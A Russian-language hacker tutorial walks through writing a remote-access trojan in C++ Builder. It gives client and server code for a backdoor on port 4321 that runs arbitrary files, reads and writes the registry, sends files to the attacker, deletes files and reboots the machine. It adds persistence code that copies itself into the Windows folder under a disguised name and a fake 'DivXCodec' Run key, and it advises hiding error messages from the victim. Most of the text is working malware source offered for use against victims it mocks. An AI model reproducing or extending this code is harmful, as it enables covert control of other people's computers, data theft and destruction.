Сегодня мы будем учиться писать троянчик. Небольшой, но СВОЙ! Почему? Конечно-конечно, троянов в сети навалом, но рано или поздно они =вдруг= начинают определяться антивирусами, приходиться ждать апдейта етц... Ожидание - самый скучный повод. Не знаю как вы, но я ждать не люблю, да и использовать чужие трояны это совсем не по-}{аЦкERR'ски. Короче, пишем свой троян и точка.

После точки, как учили в школе, пишем с большой буквы... Так вот, о чем я? Писать я буду, как обычно, на своем любимом Builder C++. Если у вас руки растут не оттуда, откуда у меня ноги, то без проблем все переделаете под Дельфи, если припрет конечно...

Естественно, наш троян будет состоять из 2х частей =) Серверной (отправляемой как подарок ламерюге) и клиентской (оставим себе на память). Надо сказать, что я давно не юзал никакие трояны, так что не знаю что там сейчас они умеют делать, может уже и коврик под мышкой научились двигать или корпус компа открывать. Мы же пишем "троянчик", поэтому делать он будет только следующее:
1) читать, удалять, запускать файлы на удаленном компьютере
2) работать с реестром на удаленном компьютере
3) ну и традиционный набор разных бесполезных функций, типа открытие CD-ROM'a, смена клавишей мышки etc.

Перекурили и поехали!
Использовать будем стандартные компоненты TClientSocket и TServerSocket.

Начнем с клиента. Набрасываем простенький интерфейс и приступаем к реализации. Управлять удаленным компьютером будем с помощью специальных команд. Для примера пускай структура их будет такая:
Nпараметры. N - цифра. Каждому действию присвоен свой код. Т.е. например 1 - перезагрузка, 2 - чтение файла и т.д. Главное чтоб было однозначное соответствие между тем что хотим сделать (команда передаваемая клиентом) и тем что выполняет программа (обработка команды на сервере). С этим разобрались. Теперь параметры. Бывает мало передать только номер команды. Конечно, чтобы перезагрузить компьютер никаких параметров не надо (хотя можно и здесь передать параметры в функцию перезагрузки), но как например реализовать удаление файла не передавая параметра? Мы передаем команду на удаление файла, но какого?! Для этого будем использовать параметры. В качестве параметра в данном случае будет передаваться имя файла. Бывает, что мало передать один параметр. Например надо прочитать n-строчек из file.txt. Здесь необходимо передать 2 параметра. В нашем примере параметры отделяются друг от друга комбинацией "rn" - перевод каретки. Объясняется данная структура тем, что в сервере мы сначала помещаем полученную команду в TStringList и потом можем спокойно обращаться к любой строчке этого TStringList'а через свойство Strings, где i-номер строчки, а соответственно и номер параметра. В общем, это вещи достаточно очевидные.

Вот так, вроде бы только начав писать клиентскую часть мы ее уже почти и закончили! Ведь на самом деле ничего кроме отсылки команд и приема ответов от сервера она делать и не должна. Для приема ответов просто создадим поле TMemo и добавим обработчик события OnRead нашего компонента TClientSocket:
void __fastcall TForm1::TrojControllerRead(TObject *Sender,
      TCustomWinSocket *Socket)
{
Memo2->Lines->Add(Socket->ReceiveText());
}

Вот и все. Клиент законен! Переходим к серверу...

Сервер будет чуть пообъемнее. Вначале определимся с задачами:
1) получение команд
2) их обработка и выполнение соответствующих действий
3) отсылка ответа клиенту (должны же мы знать что происходит на сервере)
Реализуем...

Во-первых, никакого визуального оформления естественно не будет =) Поэтому на форму поместим только 1 компонент: TServerSocket. Инициализацию его проведем в функции FormCreate(). Хотя можно было бы просто прописать 2 параметра в Object Inspector'е. Но раз уж сделали, так сделали =)
void __fastcall TForm1::FormCreate(TObject *Sender)
{
// ServSckt - наш компонент TServerSocket
ServSckt->Port = 4321;
ServSckt->Active = true;
}

Итак, указали порт, активизировали сокет. Теперь обрабатываем событие ClientRead, т.е. получение данных сокетом. Комментирую на примере:
void __fastcall TForm1::ServScktClientRead(TObject *Sender,
      TCustomWinSocket *Socket)
{
RecCommand(Socket->ReceiveText()); // пишем для наглядности функцию обработки поступившей
          // информации, которую передаем как параметр этой функции
}
//---------------------------------------------------------------------------
// собственно сама функция: Rec - сокращение от Recognize. Можно по-другому назвать =)
void TForm1::RecCommand (String received)
{
int cn;
TTrojanUtilites Utilz;  // создаем объект наших утилит
Utilz.Sock=ServSckt; // необходимо для отсылки ответа клиенту, так как сокет у нас
    // находится на форме, а TTrojanUtilites не имеет никакого отношения
    // к форме. Просто передаем указатель на TServerSocket
String temp;
temp=received;
temp.Delete(2,temp.Length()); // получаем первый символ сообщения - номер команды
cn = StrToInt(temp);     // преобразуем в число
received.Delete(1,1);    // удаляем код команды - остаются одни параметры
switch (cn) {    // в соответсвии с полученой командой
        // запускаем соотвествующую утилиту
case 1 : Utilz.RestartMachine(); break;    // перезагрузка
case 2 : Utilz.WriteRegistry(received); break;  // запись в реестр
case 3 : Utilz.ReadRegistry(received); break; // чтение реестра
case 4 : Utilz.SendFile(received); break; // чтение файла
case 5 : Utilz.DeleteFile(received); break; // удаление файла
case 6 : Utilz.ExecuteFile(received); break; // запуск файла
case 7 : Utilz.OpenCloseCD; break;    // открытие/закрытие CD-ROM
case 8 : Utilz.HideMouse(); break;    // прячем курсор мыши
case 9 : Utilz.SwapMouseButtons(); break; // переключаем кнопки мыши
default:
SendMsgToClient("Неправильная команда!") ; // получена недопустимая команда
           // информируем клиента об этом
}
}

Теперь немного подробнее. Мы пишем специальный класс TTrojanUtilites, в котором реализуем все необходимые функции. В RecognizeCommand (String Directive) мы только отделяем команду от параметров и запускаем необходимые методы TTrojanUtilites, передавая по необходимости в них параметры.

Реализация TTrojanUtilites есть то, чем мы сейчас займемся. Класс оформим в отдельном модуле, не забудьте подключить его.

Поехали... Во-первых, подключаем #include <MMSystem.hpp> - необходимо для реализации работы с CD-ROM'ом. Далее пишем все необходимые методы.

Краткие комментарии на примере:
void TTrojanUtilites::OpenCloseCD()
{
TMCI_Open_Parms OpenParm;
TMCI_Generic_Parms  GenParm;
TMCI_Set_Parms SetParm;
Cardinal DI;
OpenParm.dwCallback = 0;
OpenParm.lpstrDeviceType = "CDAudio";
mciSendCommand(0, MCI_OPEN, MCI_OPEN_TYPE, Longint(&OpenParm));
DI = OpenParm.wDeviceID;
if (!CDROMOPEN)
{
        mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_OPEN, Longint(&SetParm));
        CDROMOPEN = true; // открыть
}
else
{
        mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_CLOSED, Longint(&SetParm));
        CDROMOPEN = false; // закрыть
}
mciSendCommand(DI, MCI_CLOSE, MCI_NOTIFY, Longint(&GenParm));
Sock->Socket->Connections[0]->SendText("Выполнено открытие/закрытие CD-ROM");
}

Перезагрузка:
void TTrojanUtilites::RestartMachine()
{
if (ExitWindowsEx(EWX_FORCE,0) || ExitWindowsEx(EWX_REBOOT,0));
        Sock->Socket->Connections[0]->SendText("Перезагрузка успешно выполнена.");
}

Вот тут я не отвечаю за все ОСи, перезагрузка-то будет, но хотелось бы сделать ее как после нажатия кнопки RESET, а так будет послано сообщение WM_...ENDSESSION etc. Короче, пробуйте сами. Могу только подкинуть основные направления поиска: смотри функции ExitWindows(), ExitWindowsEx(), InitiateSystemShutdown() и AbortSystemShutdown(). Для особо продвинутых могу предложить вариант написать надежный ребут под определенную ось и чипсет =) Например, мой прошлый комп стабильно резетился (только в Win9x, в NT не работало) следующей вставочкой:
mov dx,0cf9h
mov al,2
out dx,al
mov al,6
out dx,al

Откуда цифры? Читайте доки по чипсету =) Одним словом, универсального метода перезагрузить комп без WM_...ENDSESSION я не знаю. Если вы знаете - напишите пару строк, не в падлу =)
void TTrojanUtilites::SendFile(String F)
{
TStringList* TTSL=new (TStringList);
TStringList* TTSL2=new (TStringList);
int n, i;
TTSL->Text = F;
if (!FileExists(TTSL->Strings[0]))
{
        Sock->Socket->Connections[0]->SendText("Файл не существует.");
        return;
}
TTSL2->LoadFromFile(TTSL->Strings[0]);  // загружаем файл в TStringList
n = TTSL2->Count;    // получаем число строк в файле
if (n > StrToInt(TTSL->Strings[1])) // если надо прочитать не весь файл
        n = StrToInt(TTSL->Strings[1]); // считываем только необходимое число строк
for (i=0;iSocket->Connections[0]->SendText(TTSL2->Strings); // передаем строки клиенту
}
Вроде тут и объяснять нечего.

void TTrojanUtilites::ReadRegistry(ShortString k)
{
TRegistry* reg=new TRegistry;
String res, ts;
TStringList* TTSL=new TStringList;
HKEY k1;
// параметры передаются в следующем порядке:
////  0 - root key   
////  1 - key name
////  2 - value name
////  3 - value
////  4 - type of value
TTSL->Text = k;
ts = TTSL->Strings[0];  // выбираем RootKey
if (ts == "HKEY_CLASSES_ROOT")   k1 = HKEY_CLASSES_ROOT;
if (ts == "HKEY_CURRENT_USER")   k1 = HKEY_CURRENT_USER;
if (ts == "HKEY_LOCAL_MACHINE")  k1 = HKEY_LOCAL_MACHINE;
if (ts == "HKEY_USERS")          k1 = HKEY_USERS;
if (ts == "HKEY_CURRENT_CONFIG") k1 = HKEY_CURRENT_CONFIG;
reg->RootKey = k1;
reg->OpenKey(TTSL->Strings[1], true); // открываем раздел
ts = TTSL->Strings[3]; // читаем значение параметра опредеоенного типа
if (ts == "Bool")   // двоичный  (REG_BINARY)
        if (reg->ReadBool(TTSL->Strings[2]))
                res = "true";
        else res = "false";
if (ts == "Integer")  //  числовой   (REG_DWORD)
        res = IntToStr(reg->ReadInteger(TTSL->Strings[2]));
if (ts == "String")  // строковый (REG_SZ)
        res = reg->ReadString(TTSL->Strings[2]);
Sock->Socket->Connections[0]->SendText("Чтение реестра. Значение параметра: "+res);
// передаем клиенту значение параметра
}

Запись в реестр аналогична, только используется метод WriteBool(TTSL->Strings[2], false); для записи булевского значения, WriteInteger(TTSL->Strings[2], StrToInt(TTSL->Strings[4])); - для числового, WriteString(TTSL->Strings[2], TTSL->Strings[4]); - для строкового.

Для запуска файлов на удаленном компьютере используем следующую функцию:
void TTrojanUtilites::ExecuteFile(String f)
{
ShellExecute(GetDesktopWindow, "open", f.c_str(), "", "", SW_SHOWNORMAL);
Sock->Socket->Connections[0]->SendText("Запущен файл "+f);
}

Файл запускается в той программе, с которой ассоциирован запуск данного типа файлов, т.е. вы можете запускать не толкьо exe, com, bat, но и любые другие файлы. Html-файл откроется в Explorer'e, Opere, Netscape или еще в чем-то... Хрен знает чем там ламерюга пользуется... Можете запустить ему мп3-шку Децла послушать или Бритни какой-нить, пусть проблюется =)

Идем дальше. Парочка бесполезных функций:
void TTrojanUtilites::HideMouse()
{
ShowCursor(false);
Sock->Socket->Connections[0]->SendText("Курсор мыши скрыт");
}

No commentz...

void TTrojanUtilites::SwapMouseButtons()
{
SwapMouseButton(true);
Sock->Socket->Connections[0]->SendText("Кнопки мыши переключены");

Можно сделать переключение кнопок обратно (передайте в SwapMouseButton параметр false), но я бы посоветовал поставить таймер и каждую секунду переключать кнопки туда-сюда, веселее будет =) В падлу сейчас уже добавлять, но вкратце это будет так: добавляем TTimer на форму, устанавливаем необходимый интервал, и в обработчике события OnTimer прописываем вызов функции SwapMouseButton с параметром, противоположным прошлому вызову. Млин, все-таки все расписал =)

Теперь довольно важная функция:
void TTrojanUtilites::DeleteFile(String f)
{
if (!FileExists(f))
{
        Sock->Socket->Connections[0]->SendText("Файл не существует.");
        return;
}
TRegistry* Reg=new TRegistry;
Reg->RootKey = HKEY_LOCAL_MACHINE;
Reg->OpenKey("\Software\Microsoft\Windows\CurrentVersion\RunOnce", true);
Reg->WriteString("Filez for delete","command.com /c del "+f);
Reg->CloseKey();
Sock->Socket->Connections[0]->SendText("Файл "+f+" будет удален после перезагрузки.");
}

Данная функция НЕ удаляет файл сразу!!! Это сделано специально, так как файлы могут использоваться системой и их удаление возможно только после перезагрузки, данная функция помечает файл к удалению, а удалиться он только после перезагрузки, которую вы легко можете вызвать. Да, еще маленькое примечание: данная функция удаляет только 1 файл, если вы пометите второй файл к удалению - то будет удален только он. А первый останется нетронутым... Немного измените функцию - и можно будет удалять файлы пачками =) Могу еще добавить немного инфы на случай, если надо будет удалить целый каталог и вы точно знаете что в нем нет открытых файлов. Используйте стандартную API функцию SHFileOperation, установив тип операции wFunc в FO_DELETE. Пример:
int res;
SHFILEOPSTRUCT fo;
ZeroMemory(&fo, sizeof(fo));
fo.hwnd   = hwndOwner;  // хэндл окна-владельца прогресс-диалога
fo.pFrom  = pszFullPath; //путь
fo.wFunc  = FO_DELETE;
fo.fFlags = FOF_NOCONFIRMATION; //не спрашивать подтверждения на удаление
res = SHFileOperation(&fo);

Только внимательно все проверьте! Будет обломно если ламерюга "вдруг" увидит надпись "Папка голые тетки не может быть удалена, так как юзер активно смотрит сразу 10 порно-фильмов из нее!". А вообще, если опять удалиться в теорию, то наш главный объект Application имеет несколько полезных событий, наиболее интересное для нас OnException происходит тогда, когда в приложении возникает необработанная исключительная ситуация (деление на ноль, удаление несуществующего файла etc). По умолчанию, обработчик этого события вызывает метод ShowException для отображения окна сообщения с пояснением причины ошибки (оно нам надо?! конечно, НЕТ!). Но, вы можете изменить реакцию на событие onException, переписав его обработчик. Тут ничего трудного нет, просто я не ставил перед собой задачу написать офигенный троян, только подтолкнуть вас к этому =) Кто захочет - допишет все необходимое сам, если что - я подскажу =) Ну вот, вроде бы все функции реализовали. Теперь немного о том, что мы не сделали =) Мы не сделали: загрузку/закачку файла. Это все можно сделать подправив SendFile(). Стандартных функций для пересылки файлов через TClient(Server)Socket я не нашел, но впрочем, это не проблема - просто передавайте файлы фрагментами.

Теперь нам осталось только разобраться с автозагрузкой трояна. Сделаем следующее:
1) при запуске файл переписывается в папку, в которой установлены винды.
2) прописываем запуск нашего файла в реестре.

Реализуем =)
void __fastcall TForm1::FormCreate(TObject *Sender)
{
ServSckt->Port = 4321;
ServSckt->Active = true;
Utilz.Sock=ServSckt;
Utilz.CDROMOPEN=false;

String WinDir;
char WinDir1[144];
GetWindowsDirectory(WinDir1,144);
WinDir=WinDir1; // папка с установленными виндами

String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("\Software\Microsoft\Windows\CurrentVersion\Run", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) //если нашу программу стерли из
// автозагрузки (DivXCodec - можете поменять по желанию на любое другое название раздела)
     pReg->WriteString("DivXCodec",WinDir+"\task16man.exe"); //добавляем ее по новой

if (Application->ExeName!=WinDir+"\task16man.exe") //если файл запустили 1ый раз
{
        if (!FileExists(WinDir+"\task16man.exe"))
        {
        String dest=WinDir+"\task16man.exe";
        BOOL res=MoveFile(Application->ExeName.c_str(), dest.c_str());
// переписываем файл к виндам
        ServSckt->Active = false;
        ShellExecute(NULL,NULL,dest.c_str(),NULL,NULL,NULL); //запускаем его
        Application->Terminate(); // это приложение закрываем
        }
        else
        Application->Terminate();
// я тут не разбирал вариантов типа прога записалась в винды, но ее еще раз
// запустили и им подобных, додумайте сами =)
}
else
{
ServSckt->Port = 4321;
ServSckt->Active = true;

String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("\Software\Microsoft\Windows\CurrentVersion\Run", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) // не дай бог стерли!
    pReg->WriteString("DivXCodec",Application->ExeName); // пишем назад
}
}

В принципе, это все. Троян готов! Конечно, он тяжеловат, малофункционален etc, НО все это можно исправить, творите =) Если сделаете что-нибудь интересное - скидывайте, с радостью опубликуем это для всех. А вообще, я хочу сейчас все это переделать под API Socket'ы, без всяких компонентов, тогда и файл exe гораздо меньше станет. Если у кого-нибудь есть интерес к этому делу - напишите пару строк в мыльницу.

Товарищи ламеры! Внимательно следите теперь за соединениями по порту 4321 =) Некоторые ведь ничего не перекомпиливают и не меняют =)

На этом у меня все. Критика, предложения и 100грамм принимаются, мат и наезды отправляются в /dev/null =) МаЗу с днем рождения!